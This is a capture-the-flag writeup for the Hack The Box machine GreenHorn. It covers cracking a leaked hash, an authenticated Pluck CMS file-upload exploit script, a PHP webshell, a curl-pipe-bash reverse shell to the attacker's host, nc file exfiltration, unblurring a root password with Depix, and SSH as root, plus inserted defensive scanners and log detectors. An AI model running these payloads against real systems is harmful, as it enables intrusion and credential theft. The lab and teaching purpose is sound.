
GreenHorn
Hack The Box Machine Writeup

He is contemplating why a horn is growing out of his head
Summary
GreenHorn was an easy Linux box that had a pretty standard user step but a very interesting path to root. User centers around exploiting a Pluck CMS instance with a little lateral movement, and root involves deblurring a password from a PDF file.
To get user, the attacker must first find a hashed password on the Gitea server hosted on port 3000. Once cracked, the password can be used to exploit Pluck via an arbitrary file upload. A webshell can then be used to gain a reverse shell as www-data. To move laterally to the junior user and grab user.txt, the cracked password can be reused with su.
The root step is what makes this box so interesting. There is a PDF in the junior user's home directory that contains an embedded image, which is a blurred version of root's password. The blurred password can be unblurred via Depix and one of its default search images, but the process is finicky. Once the password is obtained, it can be used with SSH to gain a root shell and grab root.txt, completing the machine.

Not sure what this box had to do with horns or green
User
Recon
Portscan with Nmap
I began by enumerating the listening ports on the machine using an nmap scan. Running nmap with sudo makes it use the -sS stealth scan by default instead of the slower -sT connect scan type. -sC runs default enumeration scripts and -sV attempts to find version information.
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sC -sV 10.10.11.25
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 09:10 EDT
Nmap scan report for 10.10.11.25
Host is up (0.028s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 57:d6:92:8a:72:44:84:17:29:eb:5c:c9:63:6a:fe:fd (ECDSA)
|_ 256 40:ea:17:b1:b6:c5:3f:42:56:67:4a:3c:ee:75:23:2f (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://greenhorn.htb/
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=cf4121b51a3e5660; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=IevIeKIx-KJd_r5t_9NiCKlR2iY6MTcyMTc0MDIyODM2NDA4MDI0OA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Tue, 23 Jul 2024 13:10:28 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-auto">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>GreenHorn</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYX
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=a0b61cd060d1e915; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=FJiY_Avwt07YmmN8DjgtymGf_Ag6MTcyMTc0MDIzMzY2MDQzODk0Mg; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Tue, 23 Jul 2024 13:10:33 GMT
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.45 seconds
There is SSH open on port 22 and a web server running Nginx with a redirect to greenhorn.htb. I will add that to my /etc/hosts file so it can be resolved correctly. There is also a strange service on port 3000 that appears to be some kind of web server based on the 200 response to a GET request.
┌──(kali㉿kali)-[~/Desktop]
└─$ tail -n 1 /etc/hosts
10.10.11.25 greenhorn.htb
Fuzzing for virtual hosts with Wfuzz
Whenever I see a domain in use for a web server, I always like to fuzz for possible vhosts and see if I can discover any other sites. Vhosts are like subdomains but are not quite the same thing. Vhosts route requests to the correct website/resource based on the Host header, so we can brute force that header, and if there is a unique response we might have discovered a new web application.
For wfuzz, -u sets the URL and -H sets the headers, which is where we place the FUZZ keyword to be replaced. -w sets the wordlist. I run the request once to see the default response length and then filter on the Chars count with --hh 154.
┌──(kali㉿kali)-[~/Desktop]
└─$ wfuzz -u http://greenhorn.htb -H "Host:FUZZ.greenhorn.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hh 154
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://greenhorn.htb/
Total requests: 19966
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Total time: 58.79757
Processed Requests: 19966
Filtered Requests: 19966
Requests/sec.: 339.5718
No vhosts this time it appears.
Web server enumeration 80
On port 80 there is a pretty basic site with 2 tabs and some welcome messages. The pages also appear to be loaded in via the file parameter, a common trope in PHP.
Looks like a basic PHP site to me
A quick check for LFI reveals that there are defensive measures in place. We might be able to get around this later though, so it's a thing to note.
Always a good idea to fully enumerate before attempting exploitation
There is also a link to /login.php at the bottom of the page (admin) and it shows that the site is powered by Pluck which appears to be a public CMS.
And a version number, version numbers are huge because we can filter our search for public exploits
The login page has a single password form and leaks the version of Pluck as 4.7.18. A high priority now is to look for public exploits, since we have the version number. Some basic password checks like admin and password do not work. I also did some basic SQLi checking using ' and ". There also appears to be brute force protection in place after 5 attempts, so this is likely not a route we can easily exploit.
While we could likely spoof our IP to get around this blacklist, that is out of scope for an easy machine.
It can always be useful to check robots.txt as well as this can sometimes reveal sensitive endpoints.
This shows us a couple of directories but nothing overly useful
Directory bust scan with Feroxbuster
It's always good to fully enumerate, and in this case the possible attack surface is still pretty small, so I then ran a directory fuzzing scan. I know the web application is using PHP, so I will add the flag -x php to the scan to have it append .php to the wordlist entries. There appears to be some kind of scanning protection in place, as after a while every response returns a 502, so I stopped the scan.

Why... Wont.... It.... WORK....
GitTEA port 3000
This appears to be the Gitea site for the box. Gitea is like a private GitHub where code can be shared and stored.
Care for a cupa?
Clicking explore at the top right we can see one repository that can be viewed as a guest.
Well hello there.
This appears to be the code for the website found on port 80. Exploring around I was mainly looking for hard coded credentials that might have been forgotten and inside GreenHorn/data/settings/pass.php there is a hardcoded password hash of some kind.
Hard coded creds is always a top security concern
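One way to catch a committed hash like this before it is pushed, shown as an added example (not code from the box or from Pluck): a scanner that walks a checkout and flags quoted hex literals whose length matches a common unsalted digest. The sample tree, its file contents and the function names are constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Hex digest lengths and the fast, unsalted hash families that produce them.
DIGEST_LENGTHS = {32: "MD5", 40: "SHA-1", 64: "SHA-256", 128: "SHA-512"}
# A quoted run of hex characters, as it appears in a PHP/INI/ENV assignment.
HEX_LITERAL = re.compile(r"""["']([0-9a-fA-F]{32,128})["']""")
SCANNED_SUFFIXES = {".php", ".ini", ".env", ".conf", ".yml", ".yaml", ".json"}


def scan_tree(root):
    """Return (relative_path, line_no, hash_family) for each digest-shaped literal."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        rel = path.relative_to(root)
        if not path.is_file() or ".git" in rel.parts:
            continue
        if path.suffix.lower() not in SCANNED_SUFFIXES:
            continue
        text = path.read_text(errors="replace")
        for line_no, line in enumerate(text.splitlines(), start=1):
            for match in HEX_LITERAL.finditer(line):
                family = DIGEST_LENGTHS.get(len(match.group(1)))
                if family:
                    findings.append((rel.as_posix(), line_no, family))
    return findings


def build_sample_repo(root):
    """Constructed sample tree; the hash below is generated here, not taken from the box."""
    root = Path(root)
    (root / "data" / "settings").mkdir(parents=True)
    fake = hashlib.sha512(b"constructed-example-value").hexdigest()
    (root / "data" / "settings" / "pass.php").write_text(f"<?php\n$ww = '{fake}';\n?>\n")
    # Short hex values such as colour codes must not be reported.
    (root / "index.php").write_text("<?php $color = 'ff00ff'; echo 'hello'; ?>\n")
    # Documentation is outside SCANNED_SUFFIXES and is skipped.
    (root / "README.md").write_text(f"docs mention '{fake}'\n")


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_repo(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for path, line_no, family in demo():
        print(f"{path}:{line_no}: possible unsalted {family} digest committed")
```

Run as a pre-commit or CI step, a non-empty result should block the push until the value is removed from history and the credential rotated.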

How real men make tea
Crack password hash
I saved the hash to a file and then tried to run it through Hashcat's auto detection. It detected a couple of possibilities including SHA2-512, SHA3-512, and others.
Looking at the example hashes given by hashcat is not very useful either. While I began looking for indications of hashtype in the source code I tried 1700 SHA2-512 in the background (going through the list one by one) and it cracked very quickly to: iloveyou1.
┌──(kali㉿kali)-[~/Desktop]
└─$ hashcat -m 1700 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<...>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b324d7790163:iloveyou1
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1700 (SHA2-512)
<...>
Started: Tue Jul 23 10:12:45 2024
Stopped: Tue Jul 23 10:13:02 2024
Now we just need somewhere to use the password. I first tried admin:iloveyou1 on the Gitea with no luck.
Trying it on the pluck login however works and we are redirected to the admin dashboard. From most admin dashboards there is often a way to RCE so this is very promising.
What the pluck!
When you got them admin creds
Pluck exploit
Googling for pluck 4.7.18 exploit, a couple of results quickly caught my eye. There seems to be an RCE exploit based on an arbitrary file upload function of the application. There is a POC on exploit-db that helped me better understand the exploit.
It looks like if we can get logged into the application, which we can thanks to the cracked password hash, we can upload a zipfile reverse shell. The POC shows us the basic structure - we need to change the login_url, the upload_url, and the password to match GreenHorn's instance. The final script is below:
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

login_url = "http://greenhorn.htb/login.php"
upload_url = "http://greenhorn.htb/admin.php?action=installmodule"
headers = {"Referer": login_url,}
login_payload = {"cont1": "admin","bogus": "iloveyou1","submit": "Log in"}

file_path = input("ZIP file path: ")

multipart_data = MultipartEncoder(
    fields={
        "sendfile": ("shell.zip", open(file_path, "rb"), "application/zip"),
        "submit": "Upload"
    }
)

session = requests.Session()
login_response = session.post(login_url, headers=headers, data=login_payload)

if login_response.status_code == 200:
    print("Login account")

    upload_headers = {
        "Referer": upload_url,
        "Content-Type": multipart_data.content_type
    }
    upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)

    if upload_response.status_code == 200:
        print("ZIP file download.")
    else:
        print("ZIP file download error. Response code:", upload_response.status_code)
else:
    print("Login problem. response code:", login_response.status_code)

rce_url="http://greenhorn.htb/data/modules/shell/shell.php"
rce=requests.get(rce_url)
print(rce.text)
So the first thing we need to do is create a PHP webshell file called shell.php that will use the system function to execute the command we pass in the cmd parameter of a GET request.
┌──(kali㉿kali)-[~/Desktop]
└─$ cat shell.php
<?php system($_GET['cmd']); ?>
Next we must zip that file as shown in the exploit POC.
┌──(kali㉿kali)-[~/Desktop]
└─$ zip shell.zip shell.php
adding: shell.php (stored 0%)
And run the exploit.
┌──(kali㉿kali)-[~/Desktop]
└─$ python pluck.py
ZIP file path: /home/kali/Desktop/shell.zip
Login account
ZIP file download.
File not found.
For some reason the POC was not working for me so I decided to just do it manually. I went to http://greenhorn.htb/admin.php?action=installmodule and uploaded the shell.zip folder.
sometimes you just gotta do it yourself
Then I went manually to the address http://greenhorn.htb/data/modules/shell/shell.php and demonstrated RCE.
Code execution is always a great feeling
You will have to be quick as it looks like there is a script that cleans out the modules every couple of minutes.

basically lol
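A detection sketch for the activity above, added here as an example and not part of the original writeup: it scans nginx combined-format access log lines for direct requests to PHP files under data/modules/ and raises the severity when a parameter decodes to shell syntax or the client had just posted to the module installer. The log lines, client addresses and the `scan` helper are constructed for illustration, and the rule assumes legitimate visitors never request module PHP files directly.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# nginx "combined" format: ip - user [time] "METHOD target PROTO" status bytes ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A PHP file served straight out of a module directory.
MODULE_PHP = re.compile(r"^/data/modules/[^/]+/[^/]+\.php$", re.IGNORECASE)
# Characters and words that belong on a command line, not in a CMS parameter.
SHELL_HINTS = re.compile(r"[|;&`$<>]|\b(?:curl|wget|bash|sh|nc|python)\b", re.IGNORECASE)

# Constructed sample log (documentation address ranges, not captured traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [23/Jul/2024:10:29:58 -0400] "GET /?file=home HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
192.0.2.10 - - [23/Jul/2024:10:31:12 -0400] "POST /admin.php?action=installmodule HTTP/1.1" 200 4811 "-" "Mozilla/5.0"
192.0.2.10 - - [23/Jul/2024:10:31:40 -0400] "GET /data/modules/shell/shell.php?cmd=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"
192.0.2.10 - - [23/Jul/2024:10:36:59 -0400] "GET /data/modules/shell/shell.php?cmd=curl%20http://192.0.2.10:8000/rev.sh%20|%20bash HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Jul/2024:10:40:02 -0400] "GET /data/modules/blog/blog.php HTTP/1.1" 404 162 "-" "Mozilla/5.0"
""".splitlines()


def scan(lines):
    """Return one finding per request for a PHP file inside a module directory."""
    uploaders = set()  # client IPs that POSTed to the module installer
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        params = parse_qsl(url.query, keep_blank_values=True)  # percent-decodes values
        if (m["method"] == "POST" and url.path == "/admin.php"
                and ("action", "installmodule") in params):
            uploaders.add(m["ip"])
            continue
        if not MODULE_PHP.match(url.path):
            continue
        reasons = ["php-in-module-dir"]
        if m["ip"] in uploaders:
            reasons.append("follows-module-upload")
        shell_params = [name for name, value in params if SHELL_HINTS.search(value)]
        if shell_params:
            reasons.append("shell-syntax-in:" + ",".join(shell_params))
        findings.append({
            "ip": m["ip"], "time": m["time"], "path": url.path,
            "status": int(m["status"]),
            "severity": "high" if shell_params else "review",
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["path"], f["status"], ";".join(f["reasons"]))
```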
Shell as www-data
Now we have to get a reverse shell. In order to avoid any URL encoding issues my plan is to host a bash reverse shell with a python http server and then fetch that with curl and pipe it into bash.
revshells.com is a good way to generate reverse shells. The command curl http://10.10.14.6:8000/rev.sh | bash is the payload that will execute the shell by fetching it and passing it into bash.
┌──(kali㉿kali)-[~/Desktop]
└─$ cat rev.sh
#! /bin/bash
bash -i >& /dev/tcp/10.10.14.6/42069 0>&1
┌──(kali㉿kali)-[~/Desktop]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.25 - - [23/Jul/2024 10:36:59] "GET /rev.sh HTTP/1.1" 200 -
### URL
http://greenhorn.htb/data/modules/shell/shell.php?cmd=curl%20http://10.10.14.6:8000/rev.sh%20|%20bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 42069
listening on [any] 42069 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.25] 47424
bash: cannot set terminal process group (1095): Inappropriate ioctl for device
bash: no job control in this shell
www-data@greenhorn:~/html/pluck/data/modules/shell$
Script shell upgrade
Whenever I can, I like to upgrade the TTY functions of my shells so I can use things like tab autocomplete and the arrow keys. My way to accomplish this is by leveraging the script binary.
www-data@greenhorn:~/html/pluck/data/modules/shell$ script /dev/null -c bash
script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@greenhorn:~/html/pluck/data/modules/shell$ ^Z
zsh: suspended nc -lvnp 42069
┌──(kali㉿kali)-[~/Desktop]
└─$ stty raw -echo;fg
[1] + continued nc -lvnp 42069
reset
reset: unknown terminal type unknown
Terminal type? screen
www-data@greenhorn:~/html/pluck/data/modules/shell$
Shell as Junior
We still don't have user.txt yet so looking in /home it looks like we will need to move laterally to the junior user.
www-data@greenhorn:/home$ ls
git junior
It's always a good idea to try every password user combination you can with every service you have. Password reuse is very common both in CTF challenges and in the real world. In this case trying the iloveyou1 password discovered earlier with the junior user works with a simple su command to switch to the user and we can grab the user.txt file.
www-data@greenhorn:/home$ su junior
Password: iloveyou1
junior@greenhorn:~$ cat user.txt
97b0c7e1730b2faa34358a98f03861a1
If this did not work the next place I would look is in the web server configurations for passwords such as database connection credentials. This is a common way to move from a www shell to one as a user.

Don't reuse passwords next time!
Root
Enumeration
Quick checks
Enumerating sudo permissions doesn't reveal the path. Looking for interesting SUID files does not turn up anything abnormal either. A check for files owned by the junior group did not turn up anything of note. There is also nothing in /opt.
junior@greenhorn:~$ sudo -l
[sudo] password for junior:
Sorry, user junior may not run sudo on greenhorn.
junior@greenhorn:~$ find / -type f -perm -4000 2>/dev/null
/usr/libexec/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chsh
/usr/bin/umount
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/newgrp
OpenVAS.pdf
In the user's home directory there is a PDF, which is interesting. I exported it back to my attacking host using nc.
junior@greenhorn:~$ nc 10.10.14.6 42069 < 'Using OpenVAS.pdf'
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 42069 > 'Using OpenVAS.pdf'
listening on [any] 42069 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.25] 45976
Looking at the PDF, there is a message about OpenVAS and the sudo user using the command sudo /usr/sbin/openvas. There is then what appears to be a blurred password, which is presumably the root user's password.
Very interesting
Deblur password with Depix
After doing a bit more enumeration on the box and finding nothing it seemed like the path forward was deblurring the password from the PDF. Some Google searching ended up with the Depix program.
We can see the directions on the project page.
Making a Search Image
Making a Pixelized Image
It looks like we need to feed it an image file, so I right-clicked the blurred password in the PDF and saved it to my desktop.
I honestly have no idea what it is talking about with a De Bruijn sequence so I simply ran the tool with the included search images until finding one that works: debruinseq_notepad_Windows10_closeAndSpaced.png
I think that what we are supplying is a reference file for the application to deblur and test against?
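What the De Bruijn sequence gives the search image, as an added example that is not Depix's code: a De Bruijn sequence of order n over an alphabet contains every n-character combination exactly once, so a screenshot of it shows every neighbouring-character pair a pixelation block could cover. The per-character darkness values and the 1-D "pixelation" (each block averages two neighbouring characters) are constructed simplifications; they show why the tool's log separates straight matches from multiple matches.

```python
from collections import defaultdict


def de_bruijn(alphabet, n):
    """Cyclic De Bruijn sequence B(k, n), standard Lyndon-word construction."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in seq)


def linear_reference(alphabet, n):
    """Unroll the cyclic sequence so every n-gram appears without wrap-around."""
    cyclic = de_bruijn(alphabet, n)
    return cyclic + cyclic[:n - 1]


def windows(text, n):
    return [text[i:i + n] for i in range(len(text) - n + 1)]


# Constructed darkness per character; real glyphs differ by font and rendering.
INK = {"a": 2, "b": 4, "c": 6, "d": 9}


def pixelate(text):
    """Toy 1-D pixelation: each block is the average of two neighbouring characters."""
    return [(INK[x] + INK[y]) / 2 for x, y in windows(text, 2)]


def build_lookup(reference):
    """Map each block value seen in the reference to the pairs that produce it."""
    lookup = defaultdict(set)
    for pair, value in zip(windows(reference, 2), pixelate(reference)):
        lookup[value].add(pair)
    return lookup


def classify(blocks, lookup):
    """Count blocks with exactly one candidate pair versus several candidates."""
    straight = sum(1 for b in blocks if len(lookup[b]) == 1)
    multiple = sum(1 for b in blocks if len(lookup[b]) > 1)
    return straight, multiple


if __name__ == "__main__":
    ref = linear_reference("abcd", 2)
    print(ref, classify(pixelate("daddcc"), build_lookup(ref)))
```

Averaging keeps a deterministic function of the original pixels, which is why pixelation does not work as redaction and an opaque box does.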
┌──(kali㉿kali)-[~/Desktop]
└─$ git clone https://github.com/spipm/Depix.git
Cloning into 'Depix'...
remote: Enumerating objects: 250, done.
remote: Counting objects: 100% (93/93), done.
remote: Compressing objects: 100% (35/35), done.
remote: Total 250 (delta 63), reused 69 (delta 56), pack-reused 157
Receiving objects: 100% (250/250), 851.02 KiB | 8.34 MiB/s, done.
Resolving deltas: 100% (118/118), done.
┌──(kali㉿kali)-[~/Desktop]
└─$ cd Depix
┌──(kali㉿kali)-[~/Desktop/Depix]
└─$ python depix.py -p ../password.png -s ./images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png
2024-07-23 11:27:01,451 - Loading pixelated image from ../password.png
2024-07-23 11:27:01,470 - Loading search image from ./images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png
2024-07-23 11:27:02,212 - Finding color rectangles from pixelated space
2024-07-23 11:27:02,213 - Found 252 same color rectangles
2024-07-23 11:27:02,214 - 190 rectangles left after moot filter
2024-07-23 11:27:02,214 - Found 1 different rectangle sizes
2024-07-23 11:27:02,214 - Finding matches in search image
2024-07-23 11:27:02,214 - Scanning 190 blocks with size (5, 5)
2024-07-23 11:27:02,238 - Scanning in searchImage: 0/1674
2024-07-23 11:27:35,274 - Removing blocks with no matches
2024-07-23 11:27:35,275 - Splitting single matches and multiple matches
2024-07-23 11:27:35,278 - [16 straight matches | 174 multiple matches]
2024-07-23 11:27:35,278 - Trying geometrical matches on single-match squares
2024-07-23 11:27:35,514 - [29 straight matches | 161 multiple matches]
2024-07-23 11:27:35,515 - Trying another pass on geometrical matches
2024-07-23 11:27:35,716 - [41 straight matches | 149 multiple matches]
2024-07-23 11:27:35,716 - Writing single match results to output
2024-07-23 11:27:35,717 - Writing average results for multiple matches to output
2024-07-23 11:27:37,510 - Saving output image to: output.png
This reveals the password "side from side the other side side from side the other side"
Kind of reveals it to be fair

IYKYK
Shell as root
Using the password sidefromsidetheothersidesidefromsidetheotherside we are able to ssh as root, grabbing root.txt and completing the machine.
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh root@greenhorn.htb
The authenticity of host 'greenhorn.htb (10.10.11.25)' can't be established.
ED25519 key fingerprint is SHA256:FrgpM50adTncJAsWACDugfF7duPzn9d6RzjZZFHNtLo.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:24: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'greenhorn.htb' (ED25519) to the list of known hosts.
root@greenhorn.htb's password: sidefromsidetheothersidesidefromsidetheotherside
<...>
Last login: Thu Jul 18 12:55:08 2024 from 10.10.14.41
root@greenhorn:~# cat root.txt
d9f9ce6619bc8df9d67978f261bcec60
Man that's a long password, Congrats on completing the box fren
Additional Resources
Ippsec video walkthrough
0xdf writeup
0xdf.gitlab.io